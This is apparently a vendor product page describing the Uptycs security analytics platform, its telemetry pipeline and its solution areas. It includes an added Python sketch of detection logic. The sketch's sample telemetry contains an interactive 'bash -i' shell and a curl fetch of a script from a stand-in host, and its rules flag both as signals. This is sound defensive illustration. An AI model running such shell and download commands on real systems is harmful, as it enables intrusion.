

Platform highlights:

  • SaaS or On-Prem Delivery
  • 100K Endpoints per tenant
  • Dashboards and Reports
  • 1000's of Threat Intel & IOC Sources
  • Single database, multiple use-cases

The Uptycs Security Analytics Platform

The Uptycs Security Analytics Platform is built for modern defenders who have a charter to close security observability gaps across their cloud-native infrastructure. Most security stacks don’t make it easy to get the answers you need, and lack the transparency required to conduct forensics. But with unified observability across productivity endpoints, server workloads, container runtimes and orchestration systems, cloud providers, SaaS applications, and identity providers, Uptycs empowers security teams with actionable answers across their attack surface to improve enterprise-wide security. 

If you’re struggling with questions like, “What containers in my environment are running this known vulnerable package?” or “Where else is this file hash appearing across my Kubernetes Cluster?” or “How many servers have had the password rotated in the last 90 days?”, Uptycs gives you the ability to get all the answers from the same console.

What questions do you have for your environment?


One Platform, Multiple Solutions

Meet your cloud-native security solution stack. The Uptycs platform is composed of:

  1. Telemetry sourced from across the cloud-native attack surface
  2. A powerful analytics engine and data pipeline
  3. Data summarizations and visualizations that solve for multiple solutions including Cloud Workload Protection (CWPP), Cloud Security Posture Management (CSPM), eXtended Detection & Response (XDR), Insight & Inventory, and Audit, Compliance & Governance.



The Cloud-Native Attack Surface

The modern defenders' attack surface is different:

  • Data no longer lives on the corporate network alone
  • Work isn’t done just from “the office”
  • Workloads are ephemeral and dynamic
  • Identity and access systems are today’s firewall
  • Sensitive data lives in cloud-based apps like GSuite, Office 365, Salesforce, GitHub, and Slack

To protect the cloud-native attack surface, you must first be able to observe it, wherever it might be.

Using query-based sensors aligned to cloud-native asset classes (hosts, VMs, containers, orchestration systems, cloud providers, SaaS applications, and identity providers), telemetry is continuously streamed over a TLS connection, aggregated, and analyzed in the Uptycs Security Analytics Platform.

The tool suite behind our telemetry-powered approach consists of: 

  • osquery for hosts, VMs, containers
  • kubequery for container orchestration systems
  • cloudquery for cloud providers
  • saasquery for SaaS applications (coming soon!)
  • identityquery for identity providers (coming soon!)

How The Uptycs Security Analytics Platform Works

With the relevant query-based sensors active, the Uptycs Security Analytics Platform immediately begins ingesting and analyzing telemetry, normalized into a tabular format so that you have connected insights across all of your asset classes in the same place.

The Uptycs Security Analytics Platform can be visualized as a data engineering pipeline with three stages:

  1. Collect
  2. Aggregate
  3. Analyze


In the collection phase, telemetry is captured via agent deployment to the host (osquery) or via native API integrations (kubequery, cloudquery) and transferred to the Uptycs backend over HTTPS (HTTP over a TLS connection). The telemetry can be bucketed into two broad areas based on the attack surface:

  • The first grouping of telemetry is based on osquery’s ability to interface with operating system interfaces such as kaudit and eBPF on Linux, ETW on Windows, and OpenBSM or the new security API framework on macOS. Osquery uses these interfaces to collect system call behavior and then translates it into a tabular JSON format.
  • In the second grouping, cloudquery and kubequery use native API integrations to ingest data and translate it into a structured table format.

The tabular telemetry can be acted upon both while it’s streaming (for real-time correlation and alerting) and once it's been aggregated and stored (for reporting and ad hoc historical querying).

The aggregation phase is where Uptycs’ speed and scale truly shine. Our eXtended Detection Network (XDN) applies scaling techniques such as consistent hashing, layered on HTTP and TLS load balancing, to spread the ingestion load reliably across the backend. The Uptycs backend can concurrently ingest a wide variety of structured telemetry from multiple interfaces. For example, a fleet of 100,000 machines, multiple concurrent Kubernetes clusters, and thousands of AWS accounts, each providing configuration, CloudTrail activity, and AWS Flow Logs, can simultaneously connect and transmit telemetry to the Uptycs backend.

The XDN also facilitates cohort analysis. An example: telemetry is in flight from a cohort of 1,000 database servers, and anomalous behavior is identified on one of the machines. The anomalous behavior on this single machine is then converted into a real-time query that then evaluates the other 999 machines.

In the analyze phase, Lambda analytics are applied to data while it’s in flight for near-real-time correlation. While in flight, Uptycs correlates data with a variety of open source threat intel databases and independent research findings from the Uptycs Threat Research Team. Data is partitioned as a function of time and compressed so that the telemetry can be historically analyzed at scale.

This streaming analytics model allows Uptycs to take each row of structured data and correlate it using event and alert rules to generate signals. Billions of pieces of telemetry are narrowed to thousands of signals. These signals are correlated into tens of detections, making it possible for humans and automation to actually consume the insight and make data-driven decisions during investigations, for forensics efforts, and for evidence retrieval as a part of a compliance requirement.
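As an added illustration (not Uptycs code, and not a description of how their backend is implemented), the following constructed Python sketch walks through the signal funnel and the cohort step described above: osquery-style process event rows are tested against hypothetical event rules to produce signals, co-occurring signals on one host are correlated into a detection, and the anomalous row is turned into a predicate evaluated against the rest of the cohort. Hosts, paths, rule names and the URL are all constructed for the example.

```python
import json
from collections import defaultdict

# Constructed osquery-style process_events rows (tabular JSON); not real telemetry.
TELEMETRY = [json.loads(line) for line in """
{"host": "db-001", "time": 100, "path": "/usr/bin/postgres", "cmdline": "postgres -D /var/lib/pg"}
{"host": "db-001", "time": 101, "path": "/bin/bash", "cmdline": "bash -i"}
{"host": "db-001", "time": 102, "path": "/usr/bin/curl", "cmdline": "curl http://example.invalid/x.sh"}
{"host": "db-002", "time": 100, "path": "/usr/bin/postgres", "cmdline": "postgres -D /var/lib/pg"}
{"host": "db-003", "time": 105, "path": "/usr/bin/curl", "cmdline": "curl http://example.invalid/x.sh"}
""".strip().splitlines()]

# Hypothetical event rules: each row is tested on its own, and a match is a signal.
EVENT_RULES = {
    "interactive_shell": lambda r: r["path"].endswith("/bash") and "-i" in r["cmdline"].split(),
    "download_tool": lambda r: r["path"].endswith("/curl"),
}

def generate_signals(rows):
    # Funnel stage 1: every row is checked against every event rule.
    return [{"host": r["host"], "time": r["time"], "rule": name, "row": r}
            for r in rows for name, match in EVENT_RULES.items() if match(r)]

def correlate(signals, window=5):
    # Funnel stage 2: two or more distinct rules firing on one host within
    # `window` seconds are correlated into a single detection.
    by_host = defaultdict(list)
    for s in signals:
        by_host[s["host"]].append(s)
    detections = []
    for host, sigs in by_host.items():
        sigs.sort(key=lambda s: s["time"])
        for i, first in enumerate(sigs):
            hits = [s for s in sigs[i:] if s["time"] - first["time"] <= window]
            rules = sorted({s["rule"] for s in hits})
            if len(rules) >= 2:
                detections.append({"host": host, "time": first["time"], "rules": rules,
                                   "rows": [s["row"] for s in hits]})
                break  # one detection per host is enough for this illustration
    return detections

def cohort_query(anomalous_row, rows):
    # Cohort analysis: the anomalous row becomes a predicate (same binary and
    # command line) evaluated against every other host's rows.
    keys = ("path", "cmdline")
    return sorted({r["host"] for r in rows
                   if r["host"] != anomalous_row["host"]
                   and all(r[k] == anomalous_row[k] for k in keys)})

DETECTIONS = correlate(generate_signals(TELEMETRY))  # one detection, on db-001
```

Running `cohort_query` on the curl row from the db-001 detection reports db-003 as the only other cohort member showing the same behavior, while the interactive shell row matches nowhere else.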

Security Problems Uptycs Can Solve

Insights from the telemetry collected and analyzed across your cloud-native attack surface are presented as dashboards, reports, or alerts that solve for multiple security, IT, and compliance needs.

Using standards-based summarizations and visualizations, the Uptycs Security Analytics Platform helps teams solve for proactive audit-and-compliance requirements as well as reactive detection-and-response requirements.

For the purpose of Detection & Response, Uptycs applies the MITRE ATT&CK framework. For organizations that need to meet baseline Audit & Compliance or domain-specific compliance regulations, Uptycs is able to provide analytics to ensure that their business has the right security hygiene and meets the necessary regulatory compliance standards.

Uptycs Security Analytics Platform - Provided Solutions

Together, these proactive and reactive controls—along with complete transparency into your security analytics—solve for multiple needs:

  • Cloud Workload Protection (CWPP): Comprehensive security observability and compliance for your cloud workloads and cloud infrastructure. 
  • Cloud Security Posture Management (CSPM): Simplify the task of hardening your cloud attack surface and enforcing adherence to best practices, such as those defined by the CIS Benchmarks.
  • eXtended Detection & Response (XDR): Unify telemetry from your modern attack surfaces for comprehensive detection and response capabilities, moving beyond discrete alerts.
  • Insight & Inventory: Automate asset inventory for your entire endpoint fleet (macOS, Windows and Linux). Identify anomalous activity compared to a normal baseline.
  • Audit, Compliance & Governance: Simplify IT auditing and get instant compliance posture visibility to improve security governance. 
